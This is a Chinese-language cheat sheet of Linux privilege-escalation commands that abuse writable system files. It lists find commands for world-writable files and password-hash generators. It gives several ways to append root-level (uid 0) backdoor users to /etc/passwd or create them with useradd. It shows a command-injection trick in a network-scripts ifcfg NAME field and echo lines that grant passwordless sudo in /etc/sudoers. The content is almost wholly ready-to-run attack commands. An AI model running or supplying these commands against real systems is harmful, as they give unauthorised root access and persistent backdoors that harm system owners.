跳转至

可写文件提权

列出系统中可写文件

>find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
>find / -perm -2 -type f 2>/dev/null
>find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null

passwd文件

$ls –lh /etc/passwd 若是任何用户可读写
$perl -le 'print crypt("password@123","addedsalt")' 生成密码或php -r "print(crypt('aarti','123') . \"\n\");"或python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'
$echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
一条命令添加root用户
>useradd -p `openssl passwd -1 -salt 'user' 123qwe` -u 0 -o -g root  -G root -s /bin/bash -d /home/user venus
用户名venus 密码123qwe
>useradd newuser;echo "newuser:password"|chpasswd
>echo "admin:x:0:0::/:/bin/sh" >> /etc/passwd
>passwd admin修改密码
或
>useradd newuser;echo "newuser:password"|chpasswd
>useradd -p `openssl passwd 123456` guest
>useradd -p "$(openssl passwd 123456)" guest
>useradd newuwer;echo -e "123456\n123456\n" |passwd newuser

/etc/sysconfig/network-scripts/

NAME=Network /bin/id  <= 注意空格
ONBOOT=yes
DEVICE=eth0

EXEC :
./etc/sysconfig/network-scripts/ifcfg-1337

sudoers

echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers

无需密码使用sudo
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers